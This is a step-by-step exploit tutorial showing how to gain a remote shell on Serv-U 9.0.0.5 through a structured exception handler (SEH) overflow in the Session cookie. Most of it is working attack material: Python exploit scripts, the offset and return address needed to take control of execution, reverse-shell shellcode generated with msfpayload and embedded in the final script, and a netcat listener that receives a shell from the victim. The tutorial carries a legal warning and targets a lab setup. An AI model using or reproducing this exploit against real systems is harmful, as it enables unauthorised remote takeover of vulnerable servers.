Windows Buffer Overflow Tutorial: Dealing with Character Translation

Introduction

This is the third entry in my series of buffer overflow tutorials.

In case you missed them, here are entries one and two. These tutorials are designed to build upon skills taught in each of the preceding tutorials, so I recommend that you complete the first two before you attempt this one.

In this entry we will be doing another SEH stack based overflow. In this case, however, the ASCII characters in our buffer will be translated into the hexadecimal byte values they spell out by the time the buffer reaches memory at the point where the SEH overflow occurs.  This requires us to structure our buffer slightly differently, and also requires us to use a different method to find our SEH overwrite offset.

The vulnerable application we will be using is Serv-U 9.0.0.5, which has an exploitable vulnerability related to its handling of overly long Session cookie values.

Warning! Please note that this tutorial is intended for educational purposes only, and you should NOT use the skills you gain here to attack any system for which you don't have permission to access. It's illegal in most jurisdictions to access a computer system without authorisation, and if you do it and get caught (which is likely) you deserve whatever you have coming to you. Don't say you haven't been warned.


Required Knowledge

To follow this tutorial you will need to have basic knowledge of:
  • TCP/IP networking,
  • management of the Windows Operating System (including installing software, running and restarting services, connecting to remote desktop sessions, etc), and
  • running Python scripts.

You need to have good enough knowledge of the attacking system you use (whether it be BackTrack, another type of Linux, Windows or anything else) to be able to run programs and scripts as well as transfer files.

Knowledge of basic debugger usage with OllyDbg, including the ability to start and attach to programs, insert breakpoints, step through code, etc, is expected. This is covered in my first tutorial.

I will also expect at this stage that you know how a SEH Based Buffer Overflow exploit is achieved.  This is covered in my second tutorial.

Python programming skills and knowledge of Metasploit usage are a bonus but not required.


System Setup

In order to reproduce this exploit for the tutorial, I used a victim system running Windows XP SP2, and an attacking system running BackTrack 4 Final.

You don't need to reproduce my setup exactly, but I would suggest sticking to Windows XP SP2 or earlier for the victim system. The attacking system can be anything you feel comfortable in, as long as it can run the software I have specified below, and as long as you are able to translate the Linux commands I will be listing below into something appropriate for your chosen system.

If required, you can get an XP SP2 Virtual Machine to use as your victim by following the instructions in the Metasploit Unleashed course, starting in the section "02 Required Materials" - "Windows XP SP2" up to the section entitled "XP SP2 Post Install".

Your victim system must also use an x86 based processor.

In this tutorial my attacking and victim systems used the following IP Addresses. You will need to substitute the addresses of your own systems wherever these addresses appear in the code or commands listed below.
  • Attacker system: 192.168.20.11
  • Victim system: 192.168.10.27

The two systems are networked together and I have interactive GUI access to the desktop of the victim system via a remote desktop session. You will need to be able to easily and quickly switch between controlling your attacking system and the victim system when following this tutorial, and you will need to be able to transfer files from your victim system to the attacking system, so make sure you have things set up appropriately before you proceed.


Required Software on Attacking and Victim Systems

Your attacker and victim systems will need the following software installed in order to follow this tutorial. By using BackTrack 4 Final for your attacking system you will take care of all the attacking system prerequisites.

The attacking system requires the following software:
  • Python interpreter
  • Metasploit 3.x
  • Text Editor
  • Netcat

The victim system requires the following software:
  • Serv-U 9.0.0.5
  • OllyDbg

For this particular exploit, we need to send a rather large buffer to the vulnerable application, so ensure that the network between the two systems is reliable.  If you are having issues reproducing the exploitable crash, the networking layer could be causing the problem.  Confirm that you are not getting RST packets from the victim system while sending the malicious HTTP request if you can't make the application crash.  If this is the case then you will need to troubleshoot the problem at the network layer.

Serv-U also doesn't give you an obvious error when it isn't listening on port 80 because some other application has already bound to that port.  Confirm the process that is listening on port 80 by using the following commands:

Check the output of the following for the process listening on port 80 and note its process ID (PID):

netstat -ano

Match the PID listening on port 80 with its process name using the output from the below and ensure that the Serv-U.exe process is the one listening on port 80:

tasklist
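
If you would rather not match the PID by eye, the check can be sketched in Python. This is only an illustrative sketch: the function name listening_pids and the sample text are my own (the sample is hypothetical, not captured from the victim system), and it assumes the usual five column layout of 'netstat -ano' on Windows.

```python
def listening_pids(netstat_output, port):
    """Return the PIDs of TCP sockets in the LISTENING state on the given port."""
    pids = set()
    suffix = ":%d" % port
    for line in netstat_output.splitlines():
        fields = line.split()
        # Assumed columns: Proto, Local Address, Foreign Address, State, PID
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            if fields[1].endswith(suffix):
                pids.add(int(fields[4]))
    return sorted(pids)


# Hypothetical sample output, for illustration only
SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1234
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    192.168.10.27:139      0.0.0.0:0              LISTENING       4
"""

print(listening_pids(SAMPLE, 80))
```

The PID returned for port 80 is the one to look up in the tasklist output.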

Ensure that all required software is installed and operational before you proceed with this tutorial.


Attaching the Serv-U Application to a Debugger

I have covered the process of attaching a vulnerable application to a debugger extensively in my last two tutorials, so I will just provide a very brief overview of the process here.

The process that you want to attach to in OllyDbg is named Serv-U.exe, and by default it will be installed as a Windows service named "Serv-U File Server".  Stop and start the process by using the Services Control Panel option, and use OllyDbg to attach to the process once it is running.

As before, you will need to restart the vulnerable process and reattach to it in the debugger each time you want to reproduce the exploitable crash.


Triggering the Exploitable Crash

After checking the POC in the original advisory, looking at other examples of the exploit, and one other advisory, I discovered that the exploitable crash can be reproduced by sending an overly long Session cookie to the Serv-U application in an HTTP POST request.

After some trial and error involving sending different buffer sizes to the Serv-U application, and viewing the structure of the stack in the debugger, I eventually settled on a Session cookie size of 96000 bytes as being optimal for exploitation.  I won't reproduce the entire process I used here, because it makes for pretty boring reading, but it basically involved modifying the size of the buffer sent, and confirming that the SEH Handler on the stack was overwritten and that there was space inside our sent buffer after the SEH Handler.  The second criterion is not absolutely necessary, but it makes exploitation slightly easier.

Since the crash is triggered by a Session cookie sent in a POST request, we can essentially trigger it by sending the following to port 80 on the target system:

POST / HTTP/1.1
Host: Hostname
Cookie: Session=[96000 characters]

A skeleton exploit that will trigger the crash by sending a long string of "A" characters (the ASCII representation of a byte value 0x41) is shown below:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer= "\x41" * 96000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

When we trigger this crash we will get an access violation, and if we check the SEH Chain (View->SEH Chain menu option) we see that it has been overwritten with 'AAAAAAAA'.



This is unusual, because we sent the application a buffer full of 0x41 bytes, and if the SEH Handler had been overwritten from our buffer we would normally expect to see a value of 41414141, or four lots of 41.  Instead, each byte that makes up the SEH Handler overwrite has the value 'AA'.

It looks as though each ASCII character we have sent ('A' for 0x41) has been converted to a hexadecimal nibble (half a byte), so that every two characters we send end up represented in a single byte in memory.

Let's further test this theory by sending some different values in our buffer and checking to see how they are represented in memory when the application crashes.

Let's try sending 'abcd' (lower case) to the application.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="abcd" * 24000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

At the time of this crash, the SEH Handler points to CDABCDAB.




The 'abcd' has been translated to hexadecimal ABCD. Apparently the fact that our ASCII string was lower case didn't stop this Hexadecimal translation from occurring.  Let's try 'fghi'.  (To conserve space, for the next few examples I will only show the lines of code I changed.)

buffer="fghi" * 24000

This time the SEH Handler points to 000F000F.  The lowercase 'f' was converted to a Hexadecimal F, and the 'ghi' characters, which don't have a Hexadecimal equivalent, were converted to 0.

Let's try one more - 'efgh'.

buffer="efgh" * 24000

This time the SEH Handler points to 00EF00EF.  So ASCII characters A-F, regardless of case, are translated to hexadecimal values A-F, and any other character converts to a 0.

Let's do a check with numbers '0123' to confirm our Hexadecimal theory.

buffer="0123" * 24000

This time, the SEH Handler value is 23012301.  So our ASCII string of characters that we send to the application in the Session cookie is interpreted as a Hexadecimal value in the memory buffer that overwrites the SEH Handler.
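
The relationship between what we send and what the debugger shows can be sketched in a few lines of Python. This is only a model of the observed behaviour for valid hexadecimal digits, not the code Serv-U actually runs; it does not attempt to model what happens to characters outside 0-9 and A-F, and the helper names are my own.

```python
import binascii
import struct


def as_seen_in_memory(ascii_hex):
    """Decode pairs of ASCII hex digits into raw bytes (two characters per byte)."""
    return binascii.unhexlify(ascii_hex)


def as_dword(four_bytes):
    """Show four bytes the way the debugger displays a pointer (little endian)."""
    return "%08X" % struct.unpack("<I", four_bytes)[0]


for sent in ("AAAAAAAA", "abcdabcd", "01230123"):
    print(sent + " -> " + as_dword(as_seen_in_memory(sent)))
```

The byte swapped appearance of values such as 23012301 comes from the little endian display of a four byte pointer, not from the translation itself.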


Finding the Overwrite Location

In the previous two tutorials, we found offset values within our buffer by using the Metasploit pattern_create.rb script.  This method is not going to work in this case however, because the Metasploit script uses characters outside of the 0-9, A-F range, and it uses both uppercase and lowercase characters.  Any of these out of range characters will be translated to a 0, or the case information for the A-F characters will be lost, and this will prevent us from being able to provide the correct input value to pattern_offset.rb to find the offset.

We will have to use a different method to find the overwrite location.  Knowing that characters 0-9 and A-F will be represented in the memory display we see in the debugger, we can use a set of structured buffers made up of these characters only to narrow down the exact overwrite location.

Given that we have 16 characters we can use, we first break the buffer of 96000 into 16 x 6000 character blocks.  Then, based on what the overwrite value of the SEH Handler is, we will know which 6000 character block our overwrite occurs in.  The following code will do this for us:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer = ""

for i in range(0, 16):
    buffer += hex(i)[2:].upper() * 6000

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

When we run this exploit, the value of the SEH Handler is set to DDDDDDDD.  If you want to, you can confirm that the buffer is structured as expected by right clicking on the SEH Handler Value in the SEH Chain window and selecting Follow address in stack. 



On the stack you should be able to see that the SEH Handler sits within a large buffer of D values (with the exception of some minor mangling just before the SEH Handler).



This means that our overwrite occurs in the 'D' section of our buffer.  This places our overwrite location between bytes 78000 and 84000, given that 0xD x 6000 is 78000 and 0xE x 6000 is 84000.
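
The arithmetic for turning an observed hexadecimal digit into a range within the buffer can be written as a small helper. This is just a sketch of the calculation; the function name block_range is my own.

```python
def block_range(start, run_length, observed_digit):
    """Return (first, end) offsets of the run of observed_digit characters.

    start          -- offset in the buffer where the 16 runs begin
    run_length     -- number of times each of 0-9, A-F is repeated
    observed_digit -- the digit seen in the SEH Handler, e.g. "D"
    """
    first = start + int(observed_digit, 16) * run_length
    return first, first + run_length


# 16 runs of 6000 characters starting at offset 0, with D observed in the handler
print(block_range(0, 6000, "D"))
```

The same helper applies to each later round of narrowing by changing the start offset and the run length.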

Now let's narrow this down further.  6000 divided by 16 is 375.  Let's create a buffer of mostly 'A' characters, but put a block of 6000 characters made up of an even distribution of values 0-9 and A-F (375 of each) between bytes 78000 and 84000.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 78000

for i in range(0, 16):
    buffer+=hex(i)[2:].upper() * 375
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

The next value of the SEH Handler is AAAAAAAA.  This means that the overwrite occurs between bytes 3750 (0xA x 375) and 4125 (0xB x 375) within our 6000 byte buffer, or between bytes 81750 (3750 + 78000) and 82125 (4125 + 78000) within the total buffer.

If we check the overwrite location on the stack we can see the 'B' values starting a little bit below the block of 'A' values that have overwritten our SEH Handler, so we know that we are within our 6000 character mixed block.




Let's narrow it down once more.  375 doesn't divide evenly by 16, so we will use 24 of each of the 0-9 and A-F characters, making for a total block of 384 characters.  As long as we completely cover the 375 character space that we know our overwrite location sits within, it doesn't matter if we go a bit over.  We insert this set of mixed characters at the start of the 375 byte window where we know our overwrite location sits, beginning at byte 81750.

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81750

for i in range(0, 16):
    buffer+=hex(i)[2:].upper() * 24
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

This again gives us a SEH Handler value of AAAAAAAA.  When we check the stack we can see that the SEH overwrite begins after the tenth A character in the run of 24.  The pointer to the next SEH record (the 4 bytes immediately before the SEH overwrite) also has the value AAAAAAAA, and begins after the second A character.



From this we can actually work out the exact overwrite offset.  For the pointer to the next SEH record it is 2 + 240 (0xA x 24) + 81750 = 81992.  The SEH Handler itself follows 8 characters (4 bytes in memory) later, at 10 + 240 + 81750 = 82000.

Let's restructure our skeleton exploit and see if the SEH Handler is overwritten by the expected value of CCCCCCCC.
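
The same sum can be checked in Python. This is a minimal sketch of the arithmetic only; the function name exact_offset is my own, and the character counts (2 and 10) are the ones read off the stack above.

```python
def exact_offset(base, run_length, digit, chars_into_run):
    """Offset in the sent buffer of a position inside one run of a hex digit."""
    return base + int(digit, 16) * run_length + chars_into_run


next_seh_offset = exact_offset(81750, 24, "A", 2)      # pointer to next SEH record
seh_handler_offset = exact_offset(81750, 24, "A", 10)  # SEH Handler overwrite

print(next_seh_offset)
print(seh_handler_offset)
# Each 4 byte pointer in memory takes 8 ASCII characters in the sent buffer
print(seh_handler_offset - next_seh_offset)
```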

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="BBBBBBBB" # Next SEH pointer
buffer+="CCCCCCCC" # SEH Overwrite
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

Success!  We get a value of CCCCCCCC in the SEH Handler.


Finding a SEH Handler Overwrite Address

Now that we know the exact offset of the SEH Handler overwrite within our buffer, we need to find an appropriate address that can allow us to gain control of code execution via the Windows error handling routines.

As discussed in my previous tutorial on SEH Buffer Overflow exploitation, we need to find a module loaded by the application that hasn't been compiled with the /SafeSEH ON option AND which hasn't prevented all addresses in that module from being used as SEH Handlers by setting the IMAGE_DLLCHARACTERISTICS_NO_SEH flag.

As it did in the last tutorial, the OllySSEH OllyDbg plugin crashed for me again, so I'm doing things the slightly harder way once more.

I checked the list of loaded modules in OllyDbg (View->Executable Modules menu option) and looked first for a third party module loaded with the application.




As mentioned in my previous tutorials, a third party module (in other words one provided with the application itself) has the benefits of usually being compiled without the /SafeSEH ON and IMAGE_DLLCHARACTERISTICS_NO_SEH options, making it suitable for use with SEH overwrite exploits.  It also provides a stable overwrite location that should work across multiple Operating Systems, since dlls provided with the application should be identical and should be loaded from the same base address on different systems.

Looking at the list I picked the first module provided with the Serv-U application that did not have a leading zero byte in the base address - libeay32.dll.  I picked a module without a leading zero byte because zero bytes usually break buffer overflows, however it turns out in this case this doesn't actually matter because the character conversion that occurs creates each byte that appears in memory from two ASCII characters sent from our exploit.  This means that we can actually create a zero byte in memory if we wish by using two ASCII zeros (\x30), effectively giving us no bad characters in this exploit!

Let's transfer this file to our attacking system and analyse it with msfpescan to confirm that it doesn't have the compiler options set that would make it unsuitable for use in providing a SEH Overwrite address.

user@bt:/tmp$ msfpescan -i libeay32.dll | grep -E '(DllCharacteristics|SEHandler)'
DllCharacteristics           0x00000000

Remember that if we see any SEHandler entries, it means that a SEH Handler exists in the dll and that the module was compiled with /SafeSEH ON.  We see no such entries here, so we are safe on this count.

In the DllCharacteristics value, we want to confirm that the third hexadecimal digit from the right does not have the '4' bit set, which tells us that the module does not have the IMAGE_DLLCHARACTERISTICS_NO_SEH flag (0x0400) set.  If the value of that digit (the one marked by 'X' in 0x00000X00) is not 4, 5, 6, 7, C, D, E or F (in other words if the '4' bit, binary 0100, is not on), then the module does not have this flag set.  Here the digit is 0, so the 4 bit is not set and we are safe on this count as well.

Now let's proceed with finding an appropriate overwrite address in libeay32.dll.  As discussed in my SEH Buffer Overflow tutorial, to take control of code execution, we can enter into our buffer by using a RETN instruction on the third value on the stack at the time that the initial exception is handled using the Structured Exception Handler.  To do this we look for a POP, POP, RETN instruction sequence in libeay32.dll.
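
The flag test is a single bitwise AND, which is easier to get right in code than by eye. The sketch below assumes only the documented value of IMAGE_DLLCHARACTERISTICS_NO_SEH (0x0400); the helper name has_no_seh_flag is my own.

```python
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400


def has_no_seh_flag(dll_characteristics):
    """True if the module declares that none of its addresses may be SEH Handlers."""
    return bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_NO_SEH)


# Value reported by msfpescan for libeay32.dll
print(has_no_seh_flag(0x00000000))

# Hex digits in the 0x00000X00 position that have the '4' bit set
flagged_digits = [format(d, "X") for d in range(16)
                  if (d << 8) & IMAGE_DLLCHARACTERISTICS_NO_SEH]
print(flagged_digits)
```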

View the code of libeay32.dll in OllyDbg (right click on it in the Executable Modules window and hit Enter or right click and select View code in CPU), and right click in the CPU pane and select Search for->Sequence of commands.

Enter the following commands to be searched for and hit Find:

POP r32
POP r32
RETN




I found a POP, POP, RETN instruction sequence at 0FB010C1 in libeay32.dll, which I will use to overwrite the SEH Handler to gain control of the CPU.





Making use of the Character Translation to Gain Control of Code Execution

Now if you remember from my first SEH Overflow tutorial, running the POP, POP, RETN instructions takes us into our buffer four bytes before the SEH Handler address.  What we want to do to give us some usable buffer space to work in is to jump over the overwritten SEH Handler to the uninterrupted buffer space beyond.  A JUMP SHORT 6 instruction will achieve this for us, but remember that we can't just enter the \xeb\x06 bytes into our buffer directly because of the character translation to Hexadecimal.  What we need to do is instead enter the ASCII equivalent, "EB06", and let the Hexadecimal translation convert this for us to the byte equivalent.

We also need to ensure that when we enter the overwrite location we take into account the little endian order of the x86 CPU, so we enter the overwrite location of 0FB010C1 as "C110B00F".  Let's see the skeleton exploit:

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="EB069090" # Next SEH pointer \xeb\x06 JUMP SHORT 6, \x90\x90 NOP Padding
buffer+="C110B00F" # SEH Overwrite 0FB010C1 POP EBX, POP ECX, RETN libeay32.dll
   
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()
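
The two hand written strings in this exploit can be derived rather than typed, which avoids byte order mistakes. This is a small sketch using only the standard library; the helper names are my own.

```python
import binascii
import struct


def bytes_to_cookie_hex(raw):
    """ASCII hex form of raw bytes, two characters per byte, upper case."""
    return binascii.hexlify(raw).decode("ascii").upper()


def addr_to_cookie_hex(address):
    """ASCII hex form of a 32 bit address as stored in memory (little endian)."""
    return bytes_to_cookie_hex(struct.pack("<I", address))


print(addr_to_cookie_hex(0x0FB010C1))            # SEH Handler overwrite
print(bytes_to_cookie_hex(b"\xeb\x06\x90\x90"))  # short jump plus NOP padding
```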

If you set a breakpoint on the SEH Handler address and run this exploit, after you pass the exception through to the application to handle using the Shift + F9 keys, you should now be able to step execution through to the area of the buffer after the SEH Handler using the F7 key.

Remember that to set a breakpoint you can either select the address in the CPU pane and hit F2 or just hit F2 on the entry on the SEH Chain window once the crash has been triggered.


Adding the Shellcode

Now that we have control of the CPU's execution path, we need to add some shellcode to our exploit so it will do something useful.  Again, we won't be able to add the bytes of the shellcode directly to our exploit; we will need to convert them to ASCII characters first.

This command below will generate some reverse shell shellcode, and convert it to a workable format that can be easily pasted into our exploit.

user@bt:~$ msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | xxd -ps | tr 'a-f' 'A-F' | sed 's/0A$//' | sed 's/$/"/' | sed 's/^/"/'
"FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF"
"31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885"
"C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D"
"01C738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B"
"048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D683332000068"
"7773325F54684C772607FFD5B89001000029C454506829806B00FFD55050"
"50504050405068EA0FDFE0FFD589C768C0A8140B68020001BB89E66A1056"
"576899A57461FFD568636D640089E357575731F66A125956E2FD66C74424"
"3C01018D442410C60044545056565646564E565653566879CC3F86FFD589"
"E04E5646FF306808871D60FFD5BBF0B5A25668A695BD9DFFD53C067C0A80"
"FBE07505BB4713726F6A0053FFD5"

An explanation of what this command is doing may be helpful.  We run msfpayload using the R option to provide the output in raw bytes, and we then pipe this into 'xxd -ps' to convert the binary output from msfpayload into the Hexadecimal representation of the values of each individual byte.  This is similar to what you would see in a Hex Editor and also similar to the C output format of msfpayload without the \x characters before each byte.

We then pipe this into 'tr 'a-f' 'A-F''.  This is not strictly necessary since the case of the A-F characters doesn't matter for the purpose of the Hexadecimal translation; I'm just doing it to make what we enter visually match what appears in the debugger.

Then we pipe that into 'sed 's/0A$//'' which removes the trailing line feed character added by msfpayload.  Note that this expression is applied to every line of output, so check that no other line happens to end in 0A, or a legitimate byte will be stripped.  We then pipe into 'sed 's/$/"/'' and 'sed 's/^/"/'' which add double quotes to the end and start of each line for easier pasting into our exploit.

Let's see what the final exploit code looks like.
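
If xxd, tr or sed are not available on your attacking system, the formatting steps can be sketched in Python instead. This is not part of the original command; the function name to_quoted_hex_lines is my own, the 60 character width simply mirrors the 30 bytes per line that 'xxd -ps' prints, and the four bytes used below are a stand in for whatever raw bytes you have saved to convert.

```python
import binascii


def to_quoted_hex_lines(raw, width=60):
    """Hex encode raw bytes in upper case and wrap them into double quoted lines."""
    hex_text = binascii.hexlify(raw).decode("ascii").upper()
    return ['"%s"' % hex_text[i:i + width]
            for i in range(0, len(hex_text), width)]


# Stand in input for illustration only
for line in to_quoted_hex_lines(b"\xfc\xe8\x89\x00"):
    print(line)
```

Because the bytes are encoded directly rather than passed through a line oriented filter, nothing is stripped from the end of individual lines.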

#!/usr/bin/python
import socket

target_address="192.168.10.27"
target_port=80

buffer="\x41" * 81992
buffer+="EB069090" # Next SEH pointer \xeb\x06 JUMP SHORT 6, \x90\x90 NOP Padding
buffer+="C110B00F" # SEH Overwrite 0FB010C1 POP EBX, POP ECX, RETN libeay32.dll
#msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | xxd -ps | tr 'a-f' 'A-F' | sed 's/0A$//' | sed 's/$/"/' | sed 's/^/"/'
buffer+=("FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF"
"31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885"
"C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D"
"01C738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B"
"048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D683332000068"
"7773325F54684C772607FFD5B89001000029C454506829806B00FFD55050"
"50504050405068EA0FDFE0FFD589C768C0A8140B68020001BB89E66A1056"
"576899A57461FFD568636D640089E357575731F66A125956E2FD66C74424"
"3C01018D442410C60044545056565646564E565653566879CC3F86FFD589"
"E04E5646FF306808871D60FFD5BBF0B5A25668A695BD9DFFD53C067C0A80"
"FBE07505BB4713726F6A0053FFD5")
buffer+="\x41" * (96000 - len(buffer))

postreq="POST / HTTP/1.1\r\n"
postreq+= "Host: " + target_address + "\r\n"
postreq+= "Cookie: Session=" + buffer + "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(postreq)
sock.close()

Now let's set up a listener:

user@bt:~$ sudo nc -nvvlp 443
listening on [any] 443 ...

And we run the exploit:

user@bt:~$ sudo nc -nvvlp 443
listening on [any] 443 ...
connect to [192.168.20.11] from (UNKNOWN) [192.168.10.27] 2767
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We have shell!  This completes this exploit.